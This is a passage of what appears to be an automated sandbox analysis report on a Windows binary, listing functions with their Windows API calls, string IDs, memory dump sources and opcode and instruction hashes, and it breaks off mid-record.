                                    • Opcode Fuzzy Hash: 32ddf1728cd2e810751ae04ca0a82f09f4545aaf38ef5b225bacecdd4c01fab9
                                    • Instruction Fuzzy Hash: 3A516E75909300AFCB00EF14D892FAAB7A5FFC4354F10892DF59A572A2EB31DA05CB42
                                    Function 0098936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                    Download Yara Rule
                                    APIs
                                    • __swprintf.LIBCMT ref: 009893AB
                                    • __itow.LIBCMT ref: 009893DF
                                      • Part of subcall function 009A1557: _xtow@16.LIBCMT ref: 009A1578
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf_xtow@16
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 1502193981-2263619337
                                    • Opcode ID: 48d42690ee3939a5d93ef08ded24d67039531591689bcaef808e9f2e37318b7e
                                    • Instruction ID: 0f2ce39df7d601cdba6ea408387640eebe7a7f3db81c471a444fa27aa0b7efe4
                                    • Opcode Fuzzy Hash: 48d42690ee3939a5d93ef08ded24d67039531591689bcaef808e9f2e37318b7e
                                    • Instruction Fuzzy Hash: 8D41DA71504208ABDB24EB74D941FBA77E8EF85310F24486FF18AD72D1EA35D941CB50
                                    Function 009EA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009EA259
                                    • CreateCompatibleDC.GDI32(00000000), ref: 009EA260
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009EA273
                                    • SelectObject.GDI32(00000000,00000000), ref: 009EA27B
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 009EA286
                                    • DeleteDC.GDI32(00000000), ref: 009EA28F
                                    • GetWindowLongW.USER32(?,000000EC), ref: 009EA299
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009EA2AD
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009EA2B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: 28c9b9b91ed50f02f5053d8cf6db29c6001044958d4f64dead053b8ce261bd9b
                                    • Instruction ID: cec5ed216dde8edf8a7fd18429379bb42b2db8acfcc964bb9baf45337fcc51ed
                                    • Opcode Fuzzy Hash: 28c9b9b91ed50f02f5053d8cf6db29c6001044958d4f64dead053b8ce261bd9b
                                    • Instruction Fuzzy Hash: 8D316F32100159ABDF129FE5DC49FEA3B6DFF19360F110214FA29A61A0CB36EC12DB65
                                    Function 009C6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 2620052-3771769585
                                    • Opcode ID: a8f794ea72cf9e84b1e4875189849412b83eb986ed562d04ae9765342b304575
                                    • Instruction ID: e2c57eca994ec47e9d994e15a8472e084a119cd4699b32b63a2585460ef10b88
                                    • Opcode Fuzzy Hash: a8f794ea72cf9e84b1e4875189849412b83eb986ed562d04ae9765342b304575
                                    • Instruction Fuzzy Hash: 26110A72904219BBDB25ABB4AC09FDA77BCEF85710F00006DF04596081EF70DE868B92
                                    Function 009A500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009A5047
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • __gmtime64_s.LIBCMT ref: 009A50E0
                                    • __gmtime64_s.LIBCMT ref: 009A5116
                                    • __gmtime64_s.LIBCMT ref: 009A5133
                                    • __allrem.LIBCMT ref: 009A5189
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A51A5
                                    • __allrem.LIBCMT ref: 009A51BC
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A51DA
                                    • __allrem.LIBCMT ref: 009A51F1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A520F
                                    • __invoke_watson.LIBCMT ref: 009A5280
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                    • Instruction ID: 60364858a8a8b071236c6e572301140b0c0621166099c9658600ba6c88d0d565
                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                    • Instruction Fuzzy Hash: 0C71E672B00F16ABE7149F78CC91BAAB3A8AF52774F164229F914D7681E770DD408BD0
                                    Function 009C4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009C4DF8
                                    • GetMenuItemInfoW.USER32(00A41708,000000FF,00000000,00000030), ref: 009C4E59
                                    • SetMenuItemInfoW.USER32(00A41708,00000004,00000000,00000030), ref: 009C4E8F
                                    • Sleep.KERNEL32(000001F4), ref: 009C4EA1
                                    • GetMenuItemCount.USER32(?), ref: 009C4EE5
                                    • GetMenuItemID.USER32(?,00000000), ref: 009C4F01
                                    • GetMenuItemID.USER32(?,-00000001), ref: 009C4F2B
                                    • GetMenuItemID.USER32(?,?), ref: 009C4F70
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009C4FB6
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4FCA
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4FEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: e50d924df2c575edaddfc5fa5f29d14de5d830c10d48e7aa713685513cdb1a8c
                                    • Instruction ID: 50cf3579290d22ea257922831c98cfc7b6f99dbc8730d3b4f871547578e3b122
                                    • Opcode Fuzzy Hash: e50d924df2c575edaddfc5fa5f29d14de5d830c10d48e7aa713685513cdb1a8c
                                    • Instruction Fuzzy Hash: DA617D75E00249AFEB21CFA4DC98FAE7BB8EB85314F14055DF841A7291D731AD46CB22
                                    Function 009E9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009E9C98
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009E9C9B
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009E9CBF
                                    • _memset.LIBCMT ref: 009E9CD0
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009E9CE2
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009E9D5A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 5c6207e0dbd66fa2f3c80b52ed186865568ede7da5199668380f1bdf65006904
                                    • Instruction ID: 3085c65ec2f1e7823db79c6fd9d1f2415f3e6112c105e3704ea4b1c6b2a8d050
                                    • Opcode Fuzzy Hash: 5c6207e0dbd66fa2f3c80b52ed186865568ede7da5199668380f1bdf65006904
                                    • Instruction Fuzzy Hash: E7617C79900248AFDB11DFA8CC81FEEB7B8EB49704F144159FA04A7292D774AD82DB50
                                    Function 009B94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009B94FE
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 009B9549
                                    • VariantInit.OLEAUT32(?), ref: 009B955B
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 009B957B
                                    • VariantCopy.OLEAUT32(?,?), ref: 009B95BE
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 009B95D2
                                    • VariantClear.OLEAUT32(?), ref: 009B95E7
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 009B95F4
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B95FD
                                    • VariantClear.OLEAUT32(?), ref: 009B960F
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B961A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 52e8dc66a532b0b67f31ac2d06f0f5bb04b41d6f084bbe7361b85f98b58efa7b
                                    • Instruction ID: 31f8cffcde1698c7c1c3f1cd66512a2371e738956f3bd56f04b8c267a7ddf7d9
                                    • Opcode Fuzzy Hash: 52e8dc66a532b0b67f31ac2d06f0f5bb04b41d6f084bbe7361b85f98b58efa7b
                                    • Instruction Fuzzy Hash: 73412F7591021DAFCB01DFE4D884ADEBB79FF48354F008069F902A3261DB71EA46CBA1
                                    Function 009DADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • CoInitialize.OLE32 ref: 009DADF6
                                    • CoUninitialize.OLE32 ref: 009DAE01
                                    • CoCreateInstance.OLE32(?,00000000,00000017,00A0D8FC,?), ref: 009DAE61
                                    • IIDFromString.OLE32(?,?), ref: 009DAED4
                                    • VariantInit.OLEAUT32(?), ref: 009DAF6E
                                    • VariantClear.OLEAUT32(?), ref: 009DAFCF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 834269672-1287834457
                                    • Opcode ID: bcb0579d295ed27bfdc3f152597d32901fbd16a76e9f10c87abea2b008c178cf
                                    • Instruction ID: 0c8f50af6de8c709983bad77ea1e089ddb5f8a8380aa83930bd7797d319c9364
                                    • Opcode Fuzzy Hash: bcb0579d295ed27bfdc3f152597d32901fbd16a76e9f10c87abea2b008c178cf
                                    • Instruction Fuzzy Hash: 2761AE71248301AFC710DF94C848B6EBBE8AF89714F14894AF9859B391C774ED59CBA3
                                    Function 009D8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 009D8168
                                    • inet_addr.WSOCK32(?,?,?), ref: 009D81AD
                                    • gethostbyname.WSOCK32(?), ref: 009D81B9
                                    • IcmpCreateFile.IPHLPAPI ref: 009D81C7
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009D8237
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009D824D
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009D82C2
                                    • WSACleanup.WSOCK32 ref: 009D82C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 6e033ab4bd79c63e09a0dbdfd1f0875b38ce9667918096c79b4b14035452bb8d
                                    • Instruction ID: fa5112d5a5934e7b87dd317ff640696a45212acb902ce981646aa28428497027
                                    • Opcode Fuzzy Hash: 6e033ab4bd79c63e09a0dbdfd1f0875b38ce9667918096c79b4b14035452bb8d
                                    • Instruction Fuzzy Hash: B5518231644700AFDB11EF64CC45B2BB7E4AF88760F04895AFA65D73A1DB74E906CB42
                                    Function 009CE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 009CE396
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009CE40C
                                    • GetLastError.KERNEL32 ref: 009CE416
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 009CE483
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 729ea0fda1243656dbdc2cc77539087129beb623d9f09de77029af6c49da42da
                                    • Instruction ID: 1beb08af9addf994ab4e69314735b3fb98519c507b187a1eed8b8948cad118dd
                                    • Opcode Fuzzy Hash: 729ea0fda1243656dbdc2cc77539087129beb623d9f09de77029af6c49da42da
                                    • Instruction Fuzzy Hash: 2F315436E00209AFDB05EBA4D945FBDB7B8FF44304F148419F506EB2A1DB749946CB52
                                    Function 009BB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009BB98C
                                    • GetDlgCtrlID.USER32 ref: 009BB997
                                    • GetParent.USER32 ref: 009BB9B3
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 009BB9B6
                                    • GetDlgCtrlID.USER32(?), ref: 009BB9BF
                                    • GetParent.USER32(?), ref: 009BB9DB
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 009BB9DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1383977212-1403004172
                                    • Opcode ID: 901c44cf9f938b3a1fffa1a90ffaef4a906c70f7062eca797d5f20f3a8c4b1b5
                                    • Instruction ID: 04a05984ee7080f5e6afb7e5730731ba1ba7653eed6139fff060ad44674a931b
                                    • Opcode Fuzzy Hash: 901c44cf9f938b3a1fffa1a90ffaef4a906c70f7062eca797d5f20f3a8c4b1b5
                                    • Instruction Fuzzy Hash: 6B2162B5900108BFDB04EBA4CC85EFEB7B9AF45314F10411AF551972D1DBB55916DB20
                                    Function 009BB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009BBA73
                                    • GetDlgCtrlID.USER32 ref: 009BBA7E
                                    • GetParent.USER32 ref: 009BBA9A
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 009BBA9D
                                    • GetDlgCtrlID.USER32(?), ref: 009BBAA6
                                    • GetParent.USER32(?), ref: 009BBAC2
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 009BBAC5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1383977212-1403004172
                                    • Opcode ID: f5c38d4383be20d2641b904d7455eda2362ef4cdc279d3d225bb4e6a5acf20b8
                                    • Instruction ID: ee029e6a49cc657cde5a03b33ec313253c30c034e509d3a026dcf531dbfa6317
                                    • Opcode Fuzzy Hash: f5c38d4383be20d2641b904d7455eda2362ef4cdc279d3d225bb4e6a5acf20b8
                                    • Instruction Fuzzy Hash: 33217FB5A40108BBDB01EBA4CC85FFEBBB9EF45310F10401AF551A7292DBB9591A9B20
                                    Function 009BBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32 ref: 009BBAE3
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 009BBAF8
                                    • _wcscmp.LIBCMT ref: 009BBB0A
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009BBB85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: 744b91c7082103a1e2d06c39e5943a85d9738b4704fb58cbdf05f3f1887b17fa
                                    • Instruction ID: c525345b4d4c3c84c4cd49f9edf6c2f0f99cde4a50312a7511787d21c657af9a
                                    • Opcode Fuzzy Hash: 744b91c7082103a1e2d06c39e5943a85d9738b4704fb58cbdf05f3f1887b17fa
                                    • Instruction Fuzzy Hash: F4112977A48317FEFA206630DC07EE6379CAB91774F200022F904E50D5EFE6A8125654
                                    Function 009DB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 009DB2D5
                                    • CoInitialize.OLE32(00000000), ref: 009DB302
                                    • CoUninitialize.OLE32 ref: 009DB30C
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 009DB40C
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 009DB539
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 009DB56D
                                    • CoGetObject.OLE32(?,00000000,00A0D91C,?), ref: 009DB590
                                    • SetErrorMode.KERNEL32(00000000), ref: 009DB5A3
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009DB623
                                    • VariantClear.OLEAUT32(00A0D91C), ref: 009DB633
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                    • String ID:
                                    • API String ID: 2395222682-0
                                    • Opcode ID: dc297bc409e370f42f383d93b1319fe0efa12cdc421fdc35f954371e408d44d6
                                    • Instruction ID: d2f6e7f2afa63c56f99ffb7d5d47931b87c64dbb58e6b9c72d3d45b8944af156
                                    • Opcode Fuzzy Hash: dc297bc409e370f42f383d93b1319fe0efa12cdc421fdc35f954371e408d44d6
